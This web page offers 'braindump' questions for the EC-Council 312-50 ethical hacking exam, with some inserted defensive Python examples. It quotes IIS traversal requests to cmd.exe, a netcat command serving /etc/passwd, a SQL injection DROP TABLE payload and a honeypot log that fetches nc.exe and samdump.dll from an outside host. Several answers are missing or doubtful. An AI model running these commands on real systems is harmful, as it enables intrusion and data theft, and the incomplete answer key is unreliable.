Top Rebirth 312-50 exam guide Reviews!

Master the 312-50 Ethical Hacking and Countermeasures (CEHv6) content and be ready for exam day success quickly with this Testking 312-50 actual exam. We guarantee it! We make it a reality and give you real 312-50 questions in our EC-Council 312-50 braindumps. Latest 100% VALID EC-Council 312-50 Exam Questions Dumps on the page below. You can use our EC-Council 312-50 braindumps and pass your exam.

Q181. You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three-way handshake. The server has just received packet #120 from the client. The client has a receive window of 200 and the server has a receive window of 250. 

Within what range of sequence numbers should a packet sent by the client fall in order to be accepted by the server? 

A. 200-250 

B. 121-371 

C. 120-321 

D. 121-231 

E. 120-370 

Answer:

Explanation: Packet number 120 has already been received by the server, and the server's receive window is 250 packets, so any packet number from 121 (the next in sequence) to 371 (121+250) will be accepted. 


Q182. Vulnerability mapping occurs after which phase of a penetration test? 

A. Host scanning 

B. Passive information gathering 

C. Analysis of host scanning 

D. Network level discovery 

Answer: C

Explanation: The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning. 


Q183. You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe. What caused this? 

GET /scripts/root.exe?/c+dir 
GET /MSADC/root.exe?/c+dir 
GET /c/winnt/system32/cmd.exe?/c+dir 
GET /d/winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 
GET /msadc/..%5c../..%5c../..%5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 

A. The Morris worm 

B. The PIF virus 

C. Trinoo 

D. Nimda 

E. Code Red 

F. Ping of Death 

Answer: D

Explanation: The Nimda worm modifies all web content files it finds. As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines, and it allows intruders to execute arbitrary commands within the Local System security context on machines running unpatched versions of IIS. 
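The request lines in the question are the classic signature a web server administrator should be alerting on. The following is an added example (not code from the original page) of a small detector run over those lines: it percent-decodes each target twice, normalizes backslashes, and reports which heuristic fired. SAMPLE_LOG is constructed from the lines quoted above plus one benign request; the `%c0%af` line is assumed to be the percent-encoded form of the overlong UTF-8 traversal that the page renders as "..xc0xaf..".

```python
"""Flag IIS directory-traversal / command-execution probes of the kind
quoted in the question above.  Added example: this is not code from the
original page.  SAMPLE_LOG is constructed from the request lines the
question quotes, plus one benign request for contrast; the %c0%af line
is the percent-encoded form of the overlong UTF-8 traversal (an
assumption about how the page's "..xc0xaf.." was rendered)."""
from urllib.parse import unquote

SAMPLE_LOG = """\
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
GET /index.html
"""

SHELL_BINARIES = ("cmd.exe", "root.exe")


def decode_twice(s):
    """Percent-decode twice so double-encoded traversal (e.g. %255c) is
    exposed; undecodable bytes such as the overlong %c0%af become U+FFFD."""
    return unquote(unquote(s, errors="replace"), errors="replace")


def classify_request(request_line):
    """Return the names of every heuristic the request line trips
    (an empty list means the line looks benign)."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    raw_path, _, raw_query = parts[1].partition("?")
    path = decode_twice(raw_path).lower().replace("\\", "/")
    query = decode_twice(raw_query).replace("+", " ").lower()
    hits = []
    if any(name in path for name in SHELL_BINARIES):
        hits.append("shell-binary")      # request names a command interpreter
    if "../" in path:
        hits.append("traversal")         # ../ survives after decoding
    if "%c0" in raw_path.lower() or "%c1" in raw_path.lower():
        hits.append("overlong-utf8")     # IIS Unicode canonicalization bypass
    if query.startswith("/c "):
        hits.append("command-switch")    # cmd.exe /c <command> in the query
    return hits


def scan_log(log_text):
    """Run classify_request over every line; return (line, hits) for lines that fire."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if line:
            hits = classify_request(line)
            if hits:
                findings.append((line, hits))
    return findings


if __name__ == "__main__":
    for line, hits in scan_log(SAMPLE_LOG):
        print(f"{', '.join(hits):45s} {line}")
```

Decoding twice matters because the `%35c` form only becomes a backslash after a first decoding pass; a detector that decodes once and looks for `..\` misses it, while the `cmd.exe` name and the `/c` switch still give it away.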


Q184. Assuming two systems are using IPSec to protect traffic over the Internet, what type of general attack could compromise the data? 

A. Spoof Attack 

B. Smurf Attack 

C. Man in the Middle Attack 

D. Trojan Horse Attack 

E. Back Orifice Attack 

Answer: DE

Explanation: To compromise the data, the attack would need to be executed before the encryption takes place at either end of the tunnel. Trojan Horse and Back Orifice attacks both allow for potential data manipulation on host computers. In both cases, the data would be compromised either before encryption or after decryption, so IPsec is not preventing the attack. 


Q185. Which type of Nmap scan is the most reliable, but also the most visible, and likely to be picked up by an IDS? 

A. SYN scan 

B. ACK scan 

C. RST scan 

D. Connect scan 

E. FIN scan 

Answer:

Explanation: The TCP full connect (-sT) scan is the most reliable. 


Q186. What does the FIN flag in TCP define? 

A. Used to close a TCP connection 

B. Used to abort a TCP connection abruptly 

C. Used to indicate the beginning of a TCP connection 

D. Used to acknowledge receipt of a previous packet or transmission 

Answer: A

Explanation: The FIN flag stands for the word FINished. This flag is used to tear down the virtual connection created with the previous flag (SYN), which is why the FIN flag appears in the last packets exchanged on a connection. 
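To make the four answer options concrete, here is an added example (not code from the original page) that decodes the flag bits of a TCP header laid out per RFC 793 and maps the flag set to the connection phase it signals. The `build_tcp_header()` helper constructs sample headers with a zero checksum purely for the demonstration.

```python
"""Decode the flag bits of a TCP header (RFC 793 layout) and describe what
they mean for the connection's life cycle.  Added example, not code from
the original page; build_tcp_header() constructs sample headers with a
zero checksum purely for the demonstration."""
import struct

# Low six bits of the 16-bit "data offset / reserved / flags" word.
TCP_FLAG_BITS = (
    ("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04),
    ("PSH", 0x08), ("ACK", 0x10), ("URG", 0x20),
)


def build_tcp_header(src_port, dst_port, seq, ack, flags, window=65535):
    """Constructed 20-byte TCP header (data offset 5, checksum 0, urgent 0)."""
    bits = 0
    for name, bit in TCP_FLAG_BITS:
        if name in flags:
            bits |= bit
    offset_and_flags = (5 << 12) | bits
    return struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack,
                       offset_and_flags, window, 0, 0)


def parse_tcp_header(data):
    """Parse the fixed part of a TCP header into a dict with decoded flag names."""
    if len(data) < 20:
        raise ValueError("TCP header needs at least 20 bytes")
    src_port, dst_port, seq, ack, offset_and_flags, window = struct.unpack(
        "!HHIIHH", data[:16])
    flag_bits = offset_and_flags & 0x3F
    return {
        "src_port": src_port,
        "dst_port": dst_port,
        "seq": seq,
        "ack": ack,
        "data_offset": (offset_and_flags >> 12) * 4,   # header length in bytes
        "window": window,
        "flags": [name for name, bit in TCP_FLAG_BITS if flag_bits & bit],
    }


def describe_flags(flags):
    """Map a flag set to the connection phase it signals (the options in Q186)."""
    if "RST" in flags:
        return "abort: connection reset abruptly"
    if "FIN" in flags:
        return "close: sender has finished sending (graceful teardown)"
    if "SYN" in flags and "ACK" not in flags:
        return "open: first packet of the three-way handshake"
    if "SYN" in flags:
        return "open: second packet of the three-way handshake (SYN-ACK)"
    if "ACK" in flags:
        return "acknowledge: confirms receipt of earlier data"
    return "no connection-control flag set"


if __name__ == "__main__":
    for flags in (["SYN"], ["SYN", "ACK"], ["ACK"], ["FIN", "ACK"], ["RST"]):
        hdr = build_tcp_header(40000, 80, 1000, 2000, flags)
        parsed = parse_tcp_header(hdr)
        print(parsed["flags"], "->", describe_flags(parsed["flags"]))
```

A FIN segment normally also carries ACK, which is why `describe_flags()` checks RST and FIN before falling through to the plain-ACK case.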


Q187. Network Administrator Patricia is doing an audit of the network. Below are some of her findings concerning DNS. Which of these would be a cause for alarm? 

Select the best answer. 

A. There are two external DNS Servers for Internet domains. Both are AD integrated. 

B. All external DNS is done by an ISP. 

C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. 

D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server. 

Answer:

Explanations: 

A. There are two external DNS Servers for Internet domains. Both are AD integrated. This is the correct answer. Having an AD integrated DNS external server is a serious cause for alarm. There is no need for this and it causes vulnerability on the network. 

B. All external DNS is done by an ISP. 

This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk as it is offloaded onto the ISP. 

C. Internal AD Integrated DNS servers are using private DNS names that are unregistered. This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk. 

D. Private IP addresses are used on the internal network and are registered with the internal AD integrated DNS server. 

This is not the correct answer. This would not be a cause for alarm. This would actually reduce the company's network risk. 


Q188. What does the following command in netcat do? 

nc -l -u -p 55555 < /etc/passwd 

A. logs the incoming connections to /etc/passwd file 

B. loads the /etc/passwd file to the UDP port 55555 

C. grabs the /etc/passwd file when connected to UDP port 55555 

D. deletes the /etc/passwd file when connected to the UDP port 55555 

Answer: C

Explanation: -l forces netcat to listen for incoming connections. 

-u tells netcat to use UDP instead of TCP. 

-p 55555 tells netcat to use port 55555. 

< /etc/passwd feeds the /etc/passwd file to netcat's standard input, so its contents are sent to whoever connects to the port. 


Q189. The following script shows a simple SQL injection. The script builds an SQL query by concatenating hard-coded strings together with a string entered by the user: 

The user is prompted to enter the name of a city on a Web form. If she enters Chicago, the query assembled by the script looks similar to the following: 

SELECT * FROM OrdersTable WHERE ShipCity = 'Chicago' 

How will you delete the OrdersTable from the database using SQL Injection? 

A. Chicago' drop table OrdersTable --

B. Delete table'blah' OrdersTable --

C. EXEC; SELECT * OrdersTable > DROP --

D. cmdshell' 'del c:sqlmydbOrdersTable' // 

Answer: A
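The question describes the concatenation pattern but does not show the script itself. The following is an added example (not code from the original page) that places that vulnerable pattern beside its parameterized replacement and runs both against a constructed in-memory SQLite OrdersTable; the helper names are chosen here. One caveat about the engine: SQLite's `execute()` refuses the page's option A payload with a syntax error because it does not run whitespace-separated stacked statements, whereas the engine the question has in mind would execute the DROP; the string-level result is the same either way, which is what the example shows.

```python
"""Vulnerable string-built query beside its parameterized replacement.
Added example, not code from the original page: the page describes the
concatenation pattern but does not show the script itself, so the helper
names and the in-memory SQLite OrdersTable are constructed here."""
import sqlite3


def build_query_unsafe(city):
    """The pattern in the question: SQL text assembled by concatenation."""
    return "SELECT * FROM OrdersTable WHERE ShipCity = '" + city + "'"


def make_demo_db():
    """Constructed in-memory database standing in for the real OrdersTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE OrdersTable (OrderId INTEGER PRIMARY KEY, ShipCity TEXT)")
    conn.executemany("INSERT INTO OrdersTable (ShipCity) VALUES (?)",
                     [("Chicago",), ("Boston",), ("Chicago",)])
    conn.commit()
    return conn


def find_orders_unsafe(conn, city):
    """Execute the concatenated query.  Returns ("rows", rows) or ("error", message).
    SQLite rejects the page's payload with a syntax error because it does not
    run whitespace-separated stacked statements; an engine that does would
    execute the DROP that the concatenation spliced into the statement."""
    try:
        return ("rows", conn.execute(build_query_unsafe(city)).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def find_orders_safe(conn, city):
    """Parameterized query: the value travels separately from the SQL text, so
    quotes, comment markers and keywords inside it are never parsed as SQL."""
    return conn.execute("SELECT * FROM OrdersTable WHERE ShipCity = ?", (city,)).fetchall()


def table_exists(conn, name="OrdersTable"):
    """True if the named table is still present in the schema."""
    row = conn.execute("SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (name,)).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    conn = make_demo_db()
    payload = "Chicago' drop table OrdersTable --"   # option A from the question
    print("unsafe SQL text :", build_query_unsafe(payload))
    print("unsafe execution:", find_orders_unsafe(conn, payload))
    print("safe execution  :", find_orders_safe(conn, payload))
    print("table survives  :", table_exists(conn))
```

The concatenated text ends up as `... ShipCity = 'Chicago' drop table OrdersTable --'`: the user's quote closes the literal early, the DROP becomes part of the statement, and `--` comments out the script's own closing quote. With the parameterized form the whole input is a single literal, the query simply returns no rows, and the table is untouched.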


Q190. Johnny is a member of the hacking group orpheus1. He is currently working on breaking into the Department of Defense’s front end exchange server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. 

What tool would be best used to accomplish this? 

A. RainbowCrack 

B. SMBCrack 

C. SmurfCrack 

D. PSCrack 

Answer: A

Explanation: RainbowCrack is a general-purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute-force cracker tries all possible plaintexts one by one at cracking time. It is time consuming to break a complex password in this way. The idea of the time-memory trade-off is to do all of the cracking-time computation in advance and store the result in files called "rainbow tables". It does take a long time to precompute the tables. But once the one-time precomputation is finished, a time-memory trade-off cracker can be hundreds of times faster than a brute-force cracker, with the help of the precomputed tables. 

Topic 14, SQL Injection 

380. The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. 

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query that results in the commands shown below being run: 

"cmd1.exe /c open 213.116.251.162 >ftpcom" 

"cmd1.exe /c echo johna2k >>ftpcom" 

"cmd1.exe /c echo haxedj00 >>ftpcom" 

"cmd1.exe /c echo get nc.exe >>ftpcom" 

"cmd1.exe /c echo get samdump.dll >>ftpcom" 

"cmd1.exe /c echo quit >>ftpcom" 

"cmd1.exe /c ftp -s:ftpcom" 

"cmd1.exe /c nc -l -p 6969 e-cmd1.exe" 

What can you infer from the exploit given? 

A. It is a local exploit where the attacker logs in using username johna2k. 

B. There are two attackers on the system – johna2k and haxedj00. 

C. The attack is a remote exploit and the hacker downloads three files. 

D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. 

Answer: C